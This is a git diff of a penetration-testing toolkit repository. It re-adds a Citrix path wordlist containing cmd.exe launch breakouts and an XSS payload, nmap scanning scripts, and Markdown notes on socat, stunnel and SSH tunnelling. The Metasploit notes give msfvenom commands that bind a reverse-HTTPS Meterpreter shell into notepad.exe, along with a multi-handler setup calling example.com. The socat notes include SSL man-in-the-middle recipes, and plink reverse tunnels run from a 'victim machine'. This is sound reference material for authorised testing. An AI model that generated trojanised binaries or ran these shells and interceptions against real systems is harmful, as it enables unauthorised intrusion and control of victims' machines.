-/Citrix/~bespoke_company_name~/default/login.aspx?ClientDetection=On
-/Citrix/AccessPlatform/site/eswi.aspx
-/Citrix/AccessPlatform/html/dummy
-/Citrix/AccessPlatform/site/default.aspx
-/Citrix/AccessPlatform/site/launcher.aspx
-/Citrix/AccessPlatform/site/launch.ica
-/CitrixAuthService/AuthService.asmx
-/Citrix/AccessPlatform/App_Web_default.aspx
-/Citrix/AccessPlatform/App_global.asax
-/citrix/pnagent/conf
-/Citrix/AccessPlatform/webinterface.conf
-/Citrix/AccessPlatform/auth/agesso.aspx
-/Citrix/AccessPlatform/site/default.aspx
-/Citrix/AccessPlatform/site/applist.aspx
-/Citrix/NFuse161/login.asp
-/CITRIX/NFUSE/default/login.asp
-/Citrix/AccessPlatform/site/wiac.aspx
-/Citrix/NFuse151/
-/Citrix/AccessPlatform/site/appembed.aspx?NFuse_Application=Citrix.MPS.App.HYDRO
-/Citrix/AccessPlatform/app_data/auth/include/layout.ascx
-/Citrix/AccessPlatform/app_data/auth/include/style.inc
-/Citrix/AccessPlatform/site/logout.aspx
-/Citrix/AccessPlatform/site/clients.htm
-/Citrix/Xenapp/
-/Citrix/XenApp/auth/login.aspx
-/Citrix/PNAgent/config.xml
-/citrix/metaframeexp/default/login.asp?ClientDetection=On
-/citrix/metaframeexp/default/login.asp
-/citrix/Nfuse17/
-/CITRIX/NFUSE/default/login.asp
-/Citrix/NFuse161/login.asp
-/citrix/MetaFrame/default/default.aspx
-/Citrix/AccessPlatform/
-/Citrix/AccessPlatform/site/launch.ica?InitialProgram=cmd.exe
-/Citrix/AccessPlatform/site/launch.ica?InitialProgram=c:\windows\systems32\cmd.exe
-/Citrix/AccessPlatform/site/launch.ica?InitialProgram=explorer.exe
-/Citrix/AccessPlatform/site/launch.ica?NFuse_Application=Citrix.MPS.App.mstar123
-/Citrix/MetFrame/
-/Citrix/MetaFrame/auth/login.aspx
-:80
-:135
-:443
-:1494
-:2512
-:2513
-:2598
-:8082
-/pcidss/launch_report?type=AA";alert('xss');x="
-/soap
-/console.php
-/forcerestart.php
-/forcesd.php
-/console.php
-/config/edituser.php?username=1
-/login.php
-/launch.jsp
-
+/Citrix/
+/Citrix/AccessPlatform/auth/
+/Citrix/AccessPlatform/media
+/Citrix/AccessPlatform/auth/login.aspx
+/Citrix/AccessPlatform/site/applist.aspx
+/LogonAgent/Login.asp
+/Citrix/NFuse16/
+/Citrix/NFuse151/
+/Citrix/~bespoke_company_name~/default/login.aspx?ClientDetection=On
+/Citrix/AccessPlatform/site/eswi.aspx
+/Citrix/AccessPlatform/html/dummy
+/Citrix/AccessPlatform/site/default.aspx
+/Citrix/AccessPlatform/site/launcher.aspx
+/Citrix/AccessPlatform/site/launch.ica
+/CitrixAuthService/AuthService.asmx
+/Citrix/AccessPlatform/App_Web_default.aspx
+/Citrix/AccessPlatform/App_global.asax
+/citrix/pnagent/conf
+/Citrix/AccessPlatform/webinterface.conf
+/Citrix/AccessPlatform/auth/agesso.aspx
+/Citrix/AccessPlatform/site/default.aspx
+/Citrix/AccessPlatform/site/applist.aspx
+/Citrix/NFuse161/login.asp
+/CITRIX/NFUSE/default/login.asp
+/Citrix/AccessPlatform/site/wiac.aspx
+/Citrix/NFuse151/
+/Citrix/AccessPlatform/site/appembed.aspx?NFuse_Application=Citrix.MPS.App.HYDRO
+/Citrix/AccessPlatform/app_data/auth/include/layout.ascx
+/Citrix/AccessPlatform/app_data/auth/include/style.inc
+/Citrix/AccessPlatform/site/logout.aspx
+/Citrix/AccessPlatform/site/clients.htm
+/Citrix/Xenapp/
+/Citrix/XenApp/auth/login.aspx
+/Citrix/PNAgent/config.xml
+/citrix/metaframeexp/default/login.asp?ClientDetection=On
+/citrix/metaframeexp/default/login.asp
+/citrix/Nfuse17/
+/CITRIX/NFUSE/default/login.asp
+/Citrix/NFuse161/login.asp
+/citrix/MetaFrame/default/default.aspx
+/Citrix/AccessPlatform/
+/Citrix/AccessPlatform/site/launch.ica?InitialProgram=cmd.exe
+/Citrix/AccessPlatform/site/launch.ica?InitialProgram=c:\windows\systems32\cmd.exe
+/Citrix/AccessPlatform/site/launch.ica?InitialProgram=explorer.exe
+/Citrix/AccessPlatform/site/launch.ica?NFuse_Application=Citrix.MPS.App.mstar123
+/Citrix/MetFrame/
+/Citrix/MetaFrame/auth/login.aspx
+:80
+:135
+:443
+:1494
+:2512
+:2513
+:2598
+:8082
+/pcidss/launch_report?type=AA";alert('xss');x="
+/soap
+/console.php
+/forcerestart.php
+/forcesd.php
+/console.php
+/config/edituser.php?username=1
+/login.php
+/launch.jsp
+
diff --git a/live-hosts/discover-live-hosts-top100.sh b/live-hosts/discover-live-hosts-top100.sh
index 0c69fe5..e6ab32b 100644
--- a/live-hosts/discover-live-hosts-top100.sh
+++ b/live-hosts/discover-live-hosts-top100.sh
@@ -1,37 +1,37 @@
- #!/bin/bash
-
-# This file is part of PenTestKit
-# Copyright (C) 2017-2019 @maldevel
-# https://github.com/maldevel/PenTestKit
-#
-# PenTestKit - Useful tools for Penetration Testing.
-#
-# This program is free software: you can redistribute it and/or modify
-# it under the terms of the GNU General Public License as published by
-# the Free Software Foundation, either version 3 of the License, or
-# (at your option) any later version.
-#
-# This program is distributed in the hope that it will be useful,
-# but WITHOUT ANY WARRANTY; without even the implied warranty of
-# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
-# GNU General Public License for more details.
-#
-# You should have received a copy of the GNU General Public License
-# along with this program. If not, see .
-#
-# For more see the file 'LICENSE' for copying permission.
-
-
-if [[ $EUID -ne 0 ]]; then
- echo "For better results, please run this script as root." 1>&2
- exit 1
-fi
-
-if [ $# -eq 1 ]; then
- LOGNAME="live_hosts_tcp_top100_$1"
- LOGNAME=$(echo "$LOGNAME" | sed -r 's/[/]+/_/g' | sed -r 's/[.]+/_/g')
- LOGNAME2="$LOGNAME.txt"
- nmap -sS -n -Pn --top-ports 100 --reason --open -T4 -oA $LOGNAME $1 | grep 'report' | grep -v 'host down' | grep -v 'closed ports' | sed 's/Nmap scan report for //' | sort -u -n -t . -k 1,1 -k 2,2 -k 3,3 -k 4,4 | tee $LOGNAME2
-else
- echo "Please provide the target IP range."
-fi
+ #!/bin/bash
+
+# This file is part of PenTestKit
+# Copyright (C) 2017-2019 @maldevel
+# https://github.com/maldevel/PenTestKit
+#
+# PenTestKit - Useful tools for Penetration Testing.
+#
+# This program is free software: you can redistribute it and/or modify
+# it under the terms of the GNU General Public License as published by
+# the Free Software Foundation, either version 3 of the License, or
+# (at your option) any later version.
+#
+# This program is distributed in the hope that it will be useful,
+# but WITHOUT ANY WARRANTY; without even the implied warranty of
+# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
+# GNU General Public License for more details.
+#
+# You should have received a copy of the GNU General Public License
+# along with this program. If not, see .
+#
+# For more see the file 'LICENSE' for copying permission.
+
+
+if [[ $EUID -ne 0 ]]; then
+ echo "For better results, please run this script as root." 1>&2
+ exit 1
+fi
+
+if [ $# -eq 1 ]; then
+ LOGNAME="live_hosts_tcp_top100_$1"
+ LOGNAME=$(echo "$LOGNAME" | sed -r 's/[/]+/_/g' | sed -r 's/[.]+/_/g')
+ LOGNAME2="$LOGNAME.txt"
+ nmap -sS -n -Pn --top-ports 100 --reason --open -T4 -oA $LOGNAME $1 | grep 'report' | grep -v 'host down' | grep -v 'closed ports' | sed 's/Nmap scan report for //' | sort -u -n -t . -k 1,1 -k 2,2 -k 3,3 -k 4,4 | tee $LOGNAME2
+else
+ echo "Please provide the target IP range."
+fi
diff --git a/metasploit/binding.md b/metasploit/binding.md
index 36b4187..2032347 100644
--- a/metasploit/binding.md
+++ b/metasploit/binding.md
@@ -1,7 +1,7 @@
-## File Binding
-
-### Executable files
-
-```bash
-msfvenom -a x86 --platform windows -x notepad.exe -k -p windows/meterpreter/reverse_https lhost=example.com lport=443 -b "\x00" -f exe -o new_notepad.exe
-```
+## File Binding
+
+### Executable files
+
+```bash
+msfvenom -a x86 --platform windows -x notepad.exe -k -p windows/meterpreter/reverse_https lhost=example.com lport=443 -b "\x00" -f exe -o new_notepad.exe
+```
diff --git a/metasploit/multi-handler.md b/metasploit/multi-handler.md
index 1bafa40..57c9c02 100644
--- a/metasploit/multi-handler.md
+++ b/metasploit/multi-handler.md
@@ -1,51 +1,51 @@
-## Multi Handler
-
-### Run metasploit multi handler
-
-```bash
-msfconsole
-use exploit/multi/handler
-set PAYLOAD windows/meterpreter/reverse_https
-set LHOST example.com
-set LPORT 443
-```
-
-### Session will never timeout
-
-```bash
-set SessionCommunicationTimeout 0
-```
-
-### Execute commands on new session connection
-
-```bash
-set autorunscript multi_console_command -cl "screenshot","sysinfo"
-```
-
-### Don’t exit once the first meterpreter connection is established
-
-```bash
-set ExitOnSession false
-```
-
-### Run all meterpreter connections in the background automatically
-
-```bash
-exploit -j
-```
-
-### List sessions
-
-```bash
-sessions -l
-```
-
-### Interact with a shell
-
-```bash
-sessions -i 5
-```
-
-### Send interaction with session 5 to background
-
-Press ctrl+z
+## Multi Handler
+
+### Run metasploit multi handler
+
+```bash
+msfconsole
+use exploit/multi/handler
+set PAYLOAD windows/meterpreter/reverse_https
+set LHOST example.com
+set LPORT 443
+```
+
+### Session will never timeout
+
+```bash
+set SessionCommunicationTimeout 0
+```
+
+### Execute commands on new session connection
+
+```bash
+set autorunscript multi_console_command -cl "screenshot","sysinfo"
+```
+
+### Don’t exit once the first meterpreter connection is established
+
+```bash
+set ExitOnSession false
+```
+
+### Run all meterpreter connections in the background automatically
+
+```bash
+exploit -j
+```
+
+### List sessions
+
+```bash
+sessions -l
+```
+
+### Interact with a shell
+
+```bash
+sessions -i 5
+```
+
+### Send interaction with session 5 to background
+
+Press ctrl+z
diff --git a/metasploit/payloads.md b/metasploit/payloads.md
index 7c8b0a2..689fbd8 100644
--- a/metasploit/payloads.md
+++ b/metasploit/payloads.md
@@ -1,11 +1,11 @@ -## Payload Generation - -### Reverse https meterpreter - -```bash -msfvenom -a x86 --platform windows -p windows/meterpreter/reverse_https lhost=example.com lport=443 -f exe -o my.exe -``` - -```bash -msfvenom -a x64 --platform windows -p windows/x64/meterpreter/reverse_https lhost=example.com lport=443 -f exe -o my.exe -``` +## Payload Generation + +### Reverse https meterpreter + +```bash +msfvenom -a x86 --platform windows -p windows/meterpreter/reverse_https lhost=example.com lport=443 -f exe -o my.exe +``` + +```bash +msfvenom -a x64 --platform windows -p windows/x64/meterpreter/reverse_https lhost=example.com lport=443 -f exe -o my.exe +``` diff --git a/misc/helpful-commands.md b/misc/helpful-commands.md index 3de23c7..597a79c 100644 --- a/misc/helpful-commands.md +++ b/misc/helpful-commands.md @@ -1,8 +1,8 @@ -## Helpful commands during PT - -**duplicate the end of each line at the end of line itself** - -```bash -paste -d ' ' filename1 filename1 -``` - +## Helpful commands during PT + +**duplicate the end of each line at the end of line itself** + +```bash +paste -d ' ' filename1 filename1 +``` + diff --git a/misc/openvas.md b/misc/openvas.md index ef0c47f..db29f1b 100644 --- a/misc/openvas.md +++ b/misc/openvas.md @@ -1,16 +1,16 @@ -## OpenVAS - -### Initializing & Starting OpenVAS - -```bash -apt-get install openvas -openvas-setup -openvas-start -``` - -* https://127.0.0.1:9392 - -``` -Username: admin -Password: OpenVAS setup script -``` +## OpenVAS + +### Initializing & Starting OpenVAS + +```bash +apt-get install openvas +openvas-setup +openvas-start +``` + +* https://127.0.0.1:9392 + +``` +Username: admin +Password: OpenVAS setup script +``` diff --git a/misc/port-forwarding.md b/misc/port-forwarding.md index 4bb833f..a2a22bc 100644 --- a/misc/port-forwarding.md +++ b/misc/port-forwarding.md @@ -1,5 +1,5 @@ -## Port Forwarding - -### Linux Port Forwarding - -* rinetd +## Port Forwarding + +### Linux Port Forwarding + +* rinetd 
diff --git a/misc/socat.md b/misc/socat.md
index a2aec79..7fb8b10 100644
--- a/misc/socat.md
+++ b/misc/socat.md
@@ -1,58 +1,58 @@ -## Socat Guide - -### Tunnel a connection from a local TCP port to a remote service -```bash -socat -v tcp4-listen:8181,reuseaddr,fork tcp4:x.x.x.x:80 -``` - -### Tunnel a plain text connection to an SSL endpoint -```bash -socat -v tcp4-listen:8181,reuseaddr,fork ssl:x.x.x.x:443,verify=0 -``` - -**Enable the use of a client side certificate (authentication)** -```bash -socat -v tcp4-listen:9000,reuseaddr,fork ssl:x.x.x.x:443,verify=0,cert=./mycert.pem -``` - -### Man in the middle an SSL connection - -**Diagram** -``` -Application ==SSL==> socat #1 —plain-text—> socat #2 ==SSL==> Remote service -``` - -**Shell 1** -```bash -socat -v tcp4-listen:8181,reuseaddr,fork ssl:x.x.x.x:443,verify=0 -``` - -**Shell 2** -```bash -socat -v openssl-listen:8282,cert=cert.pem,verify=0,reuseaddr,fork -tcp4:localhost:8181 -``` - -### Modify HTTP traffic in transit to disable gzip/deflage encodings - -**Diagram** -``` -Application ==SSL==> socat #1 —plain-text—> netsed —plain-text—> socat #2 ==SSL==> Remote service -``` - -**Shell 1** -```bash -socat -v tcp4-listen:8181,reuseaddr,fork ssl:x.x.x.x:443,verify=0 -``` - -**Shell 2** -```bash -netsed tcp 8282 127.0.0.1 8181 ‘s/gzip/ ‘ ‘s/deflate/ ‘ -``` - -**Shell 3** -```bash -socat -v openssl-listen:8383,cert=cert.pem,verify=0,reuseaddr,fork -tcp4:localhost:8282 -``` - +## Socat Guide + +### Tunnel a connection from a local TCP port to a remote service +```bash +socat -v tcp4-listen:8181,reuseaddr,fork tcp4:x.x.x.x:80 +``` + +### Tunnel a plain text connection to an SSL endpoint +```bash +socat -v tcp4-listen:8181,reuseaddr,fork ssl:x.x.x.x:443,verify=0 +``` + +**Enable the use of a client side certificate (authentication)** +```bash +socat -v tcp4-listen:9000,reuseaddr,fork ssl:x.x.x.x:443,verify=0,cert=./mycert.pem +``` + +### Man in the middle an SSL connection + +**Diagram** +``` +Application ==SSL==> socat #1 —plain-text—> socat #2 ==SSL==> Remote service +``` + +**Shell 1** +```bash +socat -v 
tcp4-listen:8181,reuseaddr,fork ssl:x.x.x.x:443,verify=0 +``` + +**Shell 2** +```bash +socat -v openssl-listen:8282,cert=cert.pem,verify=0,reuseaddr,fork +tcp4:localhost:8181 +``` + +### Modify HTTP traffic in transit to disable gzip/deflage encodings + +**Diagram** +``` +Application ==SSL==> socat #1 —plain-text—> netsed —plain-text—> socat #2 ==SSL==> Remote service +``` + +**Shell 1** +```bash +socat -v tcp4-listen:8181,reuseaddr,fork ssl:x.x.x.x:443,verify=0 +``` + +**Shell 2** +```bash +netsed tcp 8282 127.0.0.1 8181 ‘s/gzip/ ‘ ‘s/deflate/ ‘ +``` + +**Shell 3** +```bash +socat -v openssl-listen:8383,cert=cert.pem,verify=0,reuseaddr,fork +tcp4:localhost:8282 +``` + diff --git a/misc/ssh.md b/misc/ssh.md index 0bb8c4b..2c30682 100644 --- a/misc/ssh.md +++ b/misc/ssh.md 
@@ -1,53 +1,53 @@ -## SSH Tunnels - -### Reverse SSH Tunnel - -*From the victim machine to our attacking box.* - -```bash -plink -l root -pw -R 3390:127.0.0.1:3389 -``` - -### SSH Local Port Forwarding - -```bash -ssh -L 0.0.0.0:4444::4444 -``` - -```bash -ssh -L 10443::443 user@ -``` - -```bash -ssh -L 0.0.0.0:45001::80 user@ -``` - -### SSH Dynamic Port Forwarding - -* Set a local listening port and have it tunnel incoming traffic to any remote destination through a socks proxy. -* SSH to create a socks4 proxy on our local attacking box and tunnel all incoming traffic to that port through DMZ network of our victim. -* Forward/Tunnel and redirect our traffic to the victim's machine. - -```bash -ssh -f -N -D 9050 root@victim.example.com -``` - -* proxychains - -```bash -nano /etc/proxychains.conf -``` - -* Content - -```bash -[ProxyList] -#... -socks4 127.0.0.1 9050 -``` - -* Run e.g. nmap - -```bash -proxychains nmap -p 80 -sT -Pn x.x.x.0/24 --open -``` +## SSH Tunnels + +### Reverse SSH Tunnel + +*From the victim machine to our attacking box.* + +```bash +plink -l root -pw -R 3390:127.0.0.1:3389 +``` + +### SSH Local Port Forwarding + +```bash +ssh -L 0.0.0.0:4444::4444 +``` + +```bash +ssh -L 10443::443 user@ +``` + +```bash +ssh -L 0.0.0.0:45001::80 user@ +``` + +### SSH Dynamic Port Forwarding + +* Set a local listening port and have it tunnel incoming traffic to any remote destination through a socks proxy. +* SSH to create a socks4 proxy on our local attacking box and tunnel all incoming traffic to that port through DMZ network of our victim. +* Forward/Tunnel and redirect our traffic to the victim's machine. + +```bash +ssh -f -N -D 9050 root@victim.example.com +``` + +* proxychains + +```bash +nano /etc/proxychains.conf +``` + +* Content + +```bash +[ProxyList] +#... +socks4 127.0.0.1 9050 +``` + +* Run e.g. nmap + +```bash +proxychains nmap -p 80 -sT -Pn x.x.x.0/24 --open +``` diff --git a/misc/stunnel.md b/misc/stunnel.md index 9c7692e..650d50c 100644 
--- a/misc/stunnel.md
+++ b/misc/stunnel.md
@@ -1,89 +1,89 @@ -## stunnel Guide - -### Installation - -```bash -sudo apt-get install stunnel4 -``` - -### Certificate - -```bash -cd /etc/stunnel -openssl genrsa -out stunnel.key 2048 -openssl req -new -key stunnel.key -out stunnel.csr -openssl x509 -req -days 365 -in stunnel.csr -signkey stunnel.key -out stunnel.crt -cat stunnel.crt stunnel.key > stunnel.pem -chmod 640 stunnel.key stunnel.pem -``` - -### Server - -* Run stunnel in server mode, listening on port 44444 and forwarding traffic to Burp Pro on 127.0.0.1:8080. - -```bash -cd /etc/stunnel -sudo nano server.conf -``` - -#### Contents - -``` -[stunnel-burp-server] -client = no -accept = 44444 -connect = 8080 -cert = /etc/stunnel/stunnel.pem -``` - -### Burp - -* Set Burp on invisible mode(Proxy->Options->Proxy Listeners->Edit->Request handling->Check Support invisible proxying..) -* Configure an upstream proxy server to forward all your traffic to 127.0.0.1 and port 22222. - -### Client - -* Run second stunnel in client mode, listening on port 22222 and forwarding all traffic to the IP address that corresponds to the target host. - -```bash -cd /etc/stunnel -sudo nano client.conf -``` - -#### Contents - -``` -[stunnel-burp-client] -client = yes -accept = 127.0.0.1:22222 -connect = target.ip.address:443 -cert = /etc/stunnel/stunnel.pem -``` - - -### Hosts file - -* Add a hosts file entry for your target host to resolve to 127.0.0.1. 
- -```bash -sudo nano /etc/hosts -127.0.0.1 target.example.com -``` - -### Stunnel - -```bash -stunnel4 /etc/stunnel/server.conf -stunnel4 /etc/stunnel/client.conf -``` - -#### Check if ports are opened - -```bash -sudo netstat -plnt | grep 44444 -sudo netstat -plnt | grep 22222 -``` - -### Testing - -* Now browse to https://target.example.com:44444 +## stunnel Guide + +### Installation + +```bash +sudo apt-get install stunnel4 +``` + +### Certificate + +```bash +cd /etc/stunnel +openssl genrsa -out stunnel.key 2048 +openssl req -new -key stunnel.key -out stunnel.csr +openssl x509 -req -days 365 -in stunnel.csr -signkey stunnel.key -out stunnel.crt +cat stunnel.crt stunnel.key > stunnel.pem +chmod 640 stunnel.key stunnel.pem +``` + +### Server + +* Run stunnel in server mode, listening on port 44444 and forwarding traffic to Burp Pro on 127.0.0.1:8080. + +```bash +cd /etc/stunnel +sudo nano server.conf +``` + +#### Contents + +``` +[stunnel-burp-server] +client = no +accept = 44444 +connect = 8080 +cert = /etc/stunnel/stunnel.pem +``` + +### Burp + +* Set Burp on invisible mode(Proxy->Options->Proxy Listeners->Edit->Request handling->Check Support invisible proxying..) +* Configure an upstream proxy server to forward all your traffic to 127.0.0.1 and port 22222. + +### Client + +* Run second stunnel in client mode, listening on port 22222 and forwarding all traffic to the IP address that corresponds to the target host. + +```bash +cd /etc/stunnel +sudo nano client.conf +``` + +#### Contents + +``` +[stunnel-burp-client] +client = yes +accept = 127.0.0.1:22222 +connect = target.ip.address:443 +cert = /etc/stunnel/stunnel.pem +``` + + +### Hosts file + +* Add a hosts file entry for your target host to resolve to 127.0.0.1. 
+ +```bash +sudo nano /etc/hosts +127.0.0.1 target.example.com +``` + +### Stunnel + +```bash +stunnel4 /etc/stunnel/server.conf +stunnel4 /etc/stunnel/client.conf +``` + +#### Check if ports are opened + +```bash +sudo netstat -plnt | grep 44444 +sudo netstat -plnt | grep 22222 +``` + +### Testing + +* Now browse to https://target.example.com:44444 diff --git a/nessus/extract-info-nessus.md b/nessus/extract-info-nessus.md index 620b550..cd3342c 100644 --- a/nessus/extract-info-nessus.md +++ b/nessus/extract-info-nessus.md @@ -1,28 +1,28 @@ -## Nessus Information - -* Export Scan results as a csv file. - -### Export Critical Vulnerabilities - -```bash -cat myproject.csv | grep '"Critical"' | sed 's/"//g' | awk -F',' '{print $5,$6,$7,$8}' | sort -``` - -### Export High Vulnerabilities - -```bash -cat myproject.csv | grep '"High"' | sed 's/"//g' | awk -F',' '{print $5,$6,$7,$8}' | sort -``` - -### Export Medium Vulnerabilities - -```bash -cat myproject.csv | grep '"Medium"' | sed 's/"//g' | awk -F',' '{print $5,$6,$7,$8}' | sort -``` - -### Export Low Vulnerabilities - -```bash -cat myproject.csv | grep '"Low"' | sed 's/"//g' | awk -F',' '{print $5,$6,$7,$8}' | sort -``` - +## Nessus Information + +* Export Scan results as a csv file. + +### Export Critical Vulnerabilities + +```bash +cat myproject.csv | grep '"Critical"' | sed 's/"//g' | awk -F',' '{print $5,$6,$7,$8}' | sort +``` + +### Export High Vulnerabilities + +```bash +cat myproject.csv | grep '"High"' | sed 's/"//g' | awk -F',' '{print $5,$6,$7,$8}' | sort +``` + +### Export Medium Vulnerabilities + +```bash +cat myproject.csv | grep '"Medium"' | sed 's/"//g' | awk -F',' '{print $5,$6,$7,$8}' | sort +``` + +### Export Low Vulnerabilities + +```bash +cat myproject.csv | grep '"Low"' | sed 's/"//g' | awk -F',' '{print $5,$6,$7,$8}' | sort +``` + 
diff --git a/port-scanning/udp/full/udp-ports-scan-full-fast-noping-nodns.sh b/port-scanning/udp/full/udp-ports-scan-full-fast-noping-nodns.sh
index 1be5de1..e5d2a8b 100644
--- a/port-scanning/udp/full/udp-ports-scan-full-fast-noping-nodns.sh
+++ b/port-scanning/udp/full/udp-ports-scan-full-fast-noping-nodns.sh
@@ -1,34 +1,34 @@
-#!/bin/bash
-
-# This file is part of PenTestKit
-# Copyright (C) 2017-2018 @maldevel
-# https://github.com/maldevel/PenTestKit
-#
-# PenTestKit - Useful tools for Penetration Testing.
-#
-# This program is free software: you can redistribute it and/or modify
-# it under the terms of the GNU General Public License as published by
-# the Free Software Foundation, either version 3 of the License, or
-# (at your option) any later version.
-#
-# This program is distributed in the hope that it will be useful,
-# but WITHOUT ANY WARRANTY; without even the implied warranty of
-# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
-# GNU General Public License for more details.
-#
-# You should have received a copy of the GNU General Public License
-# along with this program. If not, see .
-#
-# For more see the file 'LICENSE' for copying permission.
-
-
-if [[ $EUID -ne 0 ]]; then
- echo "Please run this script as root." 1>&2
- exit 1
-fi
-
-if [ $# -eq 1 ]; then
- nmap -sU -n -Pn -vv -p- --reason --open -T4 -oA udp_ports_full_$1 $1
-else
- echo "Please provide the target IP address or an IP range."
-fi
+#!/bin/bash
+
+# This file is part of PenTestKit
+# Copyright (C) 2017-2018 @maldevel
+# https://github.com/maldevel/PenTestKit
+#
+# PenTestKit - Useful tools for Penetration Testing.
+#
+# This program is free software: you can redistribute it and/or modify
+# it under the terms of the GNU General Public License as published by
+# the Free Software Foundation, either version 3 of the License, or
+# (at your option) any later version.
+#
+# This program is distributed in the hope that it will be useful,
+# but WITHOUT ANY WARRANTY; without even the implied warranty of
+# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
+# GNU General Public License for more details.
+#
+# You should have received a copy of the GNU General Public License
+# along with this program. If not, see .
+#
+# For more see the file 'LICENSE' for copying permission.
+
+
+if [[ $EUID -ne 0 ]]; then
+ echo "Please run this script as root." 1>&2
+ exit 1
+fi
+
+if [ $# -eq 1 ]; then
+ nmap -sU -n -Pn -vv -p- --reason --open -T4 -oA udp_ports_full_$1 $1
+else
+ echo "Please provide the target IP address or an IP range."
+fi
diff --git a/port-scanning/udp/full/udp-ports-scan-full-nodns.sh b/port-scanning/udp/full/udp-ports-scan-full-nodns.sh
index 89c393a..cd90474 100755
--- a/port-scanning/udp/full/udp-ports-scan-full-nodns.sh
+++ b/port-scanning/udp/full/udp-ports-scan-full-nodns.sh
@@ -1,34 +1,34 @@
-#!/bin/bash
-
-# This file is part of PenTestKit
-# Copyright (C) 2017-2018 @maldevel
-# https://github.com/maldevel/PenTestKit
-#
-# PenTestKit - Useful tools for Penetration Testing.
-#
-# This program is free software: you can redistribute it and/or modify
-# it under the terms of the GNU General Public License as published by
-# the Free Software Foundation, either version 3 of the License, or
-# (at your option) any later version.
-#
-# This program is distributed in the hope that it will be useful,
-# but WITHOUT ANY WARRANTY; without even the implied warranty of
-# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
-# GNU General Public License for more details.
-#
-# You should have received a copy of the GNU General Public License
-# along with this program. If not, see .
-#
-# For more see the file 'LICENSE' for copying permission.
-
-
-if [[ $EUID -ne 0 ]]; then
- echo "Please run this script as root." 1>&2
- exit 1
-fi
-
-if [ $# -eq 1 ]; then
- nmap -sU -n -vv -p- --reason --open -oA udp_ports_full_$1 $1
-else
- echo "Please provide the target IP address or an IP range."
-fi
+#!/bin/bash
+
+# This file is part of PenTestKit
+# Copyright (C) 2017-2018 @maldevel
+# https://github.com/maldevel/PenTestKit
+#
+# PenTestKit - Useful tools for Penetration Testing.
+#
+# This program is free software: you can redistribute it and/or modify
+# it under the terms of the GNU General Public License as published by
+# the Free Software Foundation, either version 3 of the License, or
+# (at your option) any later version.
+#
+# This program is distributed in the hope that it will be useful,
+# but WITHOUT ANY WARRANTY; without even the implied warranty of
+# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
+# GNU General Public License for more details.
+#
+# You should have received a copy of the GNU General Public License
+# along with this program. If not, see .
+#
+# For more see the file 'LICENSE' for copying permission.
+
+
+if [[ $EUID -ne 0 ]]; then
+ echo "Please run this script as root." 1>&2
+ exit 1
+fi
+
+if [ $# -eq 1 ]; then
+ nmap -sU -n -vv -p- --reason --open -oA udp_ports_full_$1 $1
+else
+ echo "Please provide the target IP address or an IP range."
+fi
diff --git a/port-scanning/udp/full/udp-ports-scan-full-noping-nodns.sh b/port-scanning/udp/full/udp-ports-scan-full-noping-nodns.sh
index 4ae8473..ec7a0d4 100755
--- a/port-scanning/udp/full/udp-ports-scan-full-noping-nodns.sh
+++ b/port-scanning/udp/full/udp-ports-scan-full-noping-nodns.sh
@@ -1,34 +1,34 @@
-#!/bin/bash
-
-# This file is part of PenTestKit
-# Copyright (C) 2017-2018 @maldevel
-# https://github.com/maldevel/PenTestKit
-#
-# PenTestKit - Useful tools for Penetration Testing.
-#
-# This program is free software: you can redistribute it and/or modify
-# it under the terms of the GNU General Public License as published by
-# the Free Software Foundation, either version 3 of the License, or
-# (at your option) any later version.
-#
-# This program is distributed in the hope that it will be useful,
-# but WITHOUT ANY WARRANTY; without even the implied warranty of
-# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
-# GNU General Public License for more details.
-#
-# You should have received a copy of the GNU General Public License
-# along with this program. If not, see .
-#
-# For more see the file 'LICENSE' for copying permission.
-
-
-if [[ $EUID -ne 0 ]]; then
- echo "Please run this script as root." 1>&2
- exit 1
-fi
-
-if [ $# -eq 1 ]; then
- nmap -sU -n -Pn -vv -p- --reason --open -oA udp_ports_full_$1 $1
-else
- echo "Please provide the target IP address or an IP range."
-fi
+#!/bin/bash
+
+# This file is part of PenTestKit
+# Copyright (C) 2017-2018 @maldevel
+# https://github.com/maldevel/PenTestKit
+#
+# PenTestKit - Useful tools for Penetration Testing.
+#
+# This program is free software: you can redistribute it and/or modify
+# it under the terms of the GNU General Public License as published by
+# the Free Software Foundation, either version 3 of the License, or
+# (at your option) any later version.
+#
+# This program is distributed in the hope that it will be useful,
+# but WITHOUT ANY WARRANTY; without even the implied warranty of
+# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
+# GNU General Public License for more details.
+#
+# You should have received a copy of the GNU General Public License
+# along with this program. If not, see .
+#
+# For more see the file 'LICENSE' for copying permission.
+
+
+if [[ $EUID -ne 0 ]]; then
+ echo "Please run this script as root." 1>&2
+ exit 1
+fi
+
+if [ $# -eq 1 ]; then
+ nmap -sU -n -Pn -vv -p- --reason --open -oA udp_ports_full_$1 $1
+else
+ echo "Please provide the target IP address or an IP range."
+fi
diff --git a/port-scanning/udp/full/udp-ports-scan-full-noping.sh b/port-scanning/udp/full/udp-ports-scan-full-noping.sh
index 8f306b6..78ace85 100755
--- a/port-scanning/udp/full/udp-ports-scan-full-noping.sh
+++ b/port-scanning/udp/full/udp-ports-scan-full-noping.sh
@@ -1,34 +1,34 @@
-#!/bin/bash
-
-# This file is part of PenTestKit
-# Copyright (C) 2017-2018 @maldevel
-# https://github.com/maldevel/PenTestKit
-#
-# PenTestKit - Useful tools for Penetration Testing.
-#
-# This program is free software: you can redistribute it and/or modify
-# it under the terms of the GNU General Public License as published by
-# the Free Software Foundation, either version 3 of the License, or
-# (at your option) any later version.
-#
-# This program is distributed in the hope that it will be useful,
-# but WITHOUT ANY WARRANTY; without even the implied warranty of
-# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
-# GNU General Public License for more details.
-#
-# You should have received a copy of the GNU General Public License
-# along with this program. If not, see .
-#
-# For more see the file 'LICENSE' for copying permission.
-
-
-if [[ $EUID -ne 0 ]]; then
- echo "Please run this script as root." 1>&2
- exit 1
-fi
-
-if [ $# -eq 1 ]; then
- nmap -sU -vv -p- -Pn --reason --open -oA udp_ports_full_$1 $1
-else
- echo "Please provide the target IP address or an IP range."
-fi
